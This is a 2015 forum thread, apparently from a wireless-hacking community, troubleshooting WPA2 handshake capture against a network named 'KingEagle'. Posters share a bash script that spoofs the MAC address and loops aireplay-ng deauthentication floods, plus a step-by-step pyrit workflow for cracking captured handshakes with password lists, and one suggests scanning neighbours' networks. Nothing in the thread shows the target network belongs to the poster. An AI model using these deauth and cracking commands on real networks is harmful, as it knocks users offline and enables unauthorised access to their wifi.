GarrettVD Posted October 11, 2015 Share Posted October 11, 2015 (edited) I'm trying to capture a 4-way WPA handshake using the Aircrack-ng suite of tools, in order to capture a 4-way WPA handshake. The first issue was that, depite being in very close proximity, I was unable to see any clients in the terminal or .csv logs while running airodump-ng targeting a specific bssid on channel 1 + sending a few mass (ie. not targeted to a specific client MAC) deauth's every 15 seconds. No clients in the .CSV logs, yet I was able to see lots of probe responses from clients on the network, and beacons etc. (See screenshot #1) So I then tried to target a specific device MAC address on the network. (Screenshot #2) The device appeared under in the CSV log under Station MACs. But still, no WPA handshakes. Weird. So I checked the logs, and I can see that there is communication to the AP from the client, and vice-versa, but no handshakes. Hmmm. BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key6C:19:8F:E5:G5:1E, 2015-10-10 00:37:36, 2015-10-10 00:40:09, 1, 54, WPA2, CCMP TKIP,PSK, -54, 1106, 96, 0. 0. 0. 0, 6, KingEagle,Using the#!/bin/bashairmon-ng stop wlan1mon; \ifconfig wlan1 down; \ifconfig wlan0 down; \macchanger -r wlan1; \ifconfig wlan1 up; \airmon-ng start wlan1 1; \airodump-ng -c 1 --bssid 6C:19:8F:E5:G5:1E --showack --write /usb/airdump-log wlan1mon </dev/null &>/dev/null & \ while sleep 15; do aireplay-ng -0 5 -a 6C:19:8F:E5:G5:1E wlan1mon --ignore-negative-one; doneI'm attaching a screenshot of the probe responses and deauthentication packets.Any help would be great!Thanks, Screenshot #1 - Mass Deauthentication Screenshot #2 - Targeting HonHai___ Edited October 11, 2015 by GarrettVD Quote Link to comment Share on other sites More sharing options...
hairbag Posted October 11, 2015 Share Posted October 11, 2015 (edited) ifconfig wlan1 down macchanger -r wlan1 iwconfig wlan1 mode monitor ifconfig wlan1 up airodump-ng -c 10 -w /path/to/Capture/output/NETGEAR --bssid 00:11:22:33:44:55 wlan1 //deauth client mac 5xaireplay-ng -0 5 -e NETGEAR -c 00:11:22:33:44:55 wlan1 Edited October 11, 2015 by hairbag Quote Link to comment Share on other sites More sharing options...
GarrettVD Posted October 11, 2015 Author Share Posted October 11, 2015 Isnt that pretty much the same thing? Quote Link to comment Share on other sites More sharing options...
hairbag Posted October 11, 2015 Share Posted October 11, 2015 you are out putting to a virtual device or file i think? how do you analyze the captured handshakes? different method of implementing the monitor mode too Quote Link to comment Share on other sites More sharing options...
GarrettVD Posted October 12, 2015 Author Share Posted October 12, 2015 Yeah logging to /usb/ which is just a USB stick mounted via fstab Checking for handshakes in Wireshark using the .cap file, filtering with filter "eapol" Quote Link to comment Share on other sites More sharing options...
hairbag Posted October 13, 2015 Share Posted October 13, 2015 (edited) havent played with wireshark enough to comment on it but above is what ive used and it always works. not sure about your script as i just do it manually in two terminal windows. one for capture and one for deauth. after capture analyze with pyrit if you are set up for gpu processing //analyze pyrit -r /path/to/capture/files/SSID-01.cap analyze //strip and clean cap file pyrit -r /path/to/capture/files/SSID-01.cap -o /path/to/capture/files/SSID-01.cap.gz strip //passthrough attack pyrit -r /path/to/capture/files/SSID-01.cap.gz -i /path/to/password/files/superWPA.lzma -b 11:22:33:44:55:66 attack_passthrough or database //import passwords pyrit -i /path/to/password/files/superWPA.lzma import_unique_passwords //add ssid to database pyrit -e create_essid SSID //batch process rainbowspyrit batch //attack cap file pyrit -r /path/to/capture/files/SSID-01.cap.gz attack_db --all-handshakes //delete ssid from db pyrit -e SSID delete_essid Edited October 13, 2015 by hairbag Quote Link to comment Share on other sites More sharing options...
GarrettVD Posted October 13, 2015 Author Share Posted October 13, 2015 That's all true man but where I'm having the issue is with capturing the intial 4-way handshake. Quote Link to comment Share on other sites More sharing options...
hairbag Posted October 13, 2015 Share Posted October 13, 2015 open up two terminals and if your arent seeing clients and the ssid in the airodump window you wont get handshakes, deauth wont work unless your nic's support injection. i remember seeing something somewhere about non-patched drivers and having to use --ignore-negative-one to avoid errors , what type of network adapters are you using? buy some alfa's and you will do the dance of joy. in your script you put wlan0 down after putting wlan1 in monitor mode...try on wlan0 try airodump-ng wlan0 --manufacturer --wps if you dont get a big list of all your neighbors wifi then your nic is the issue. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.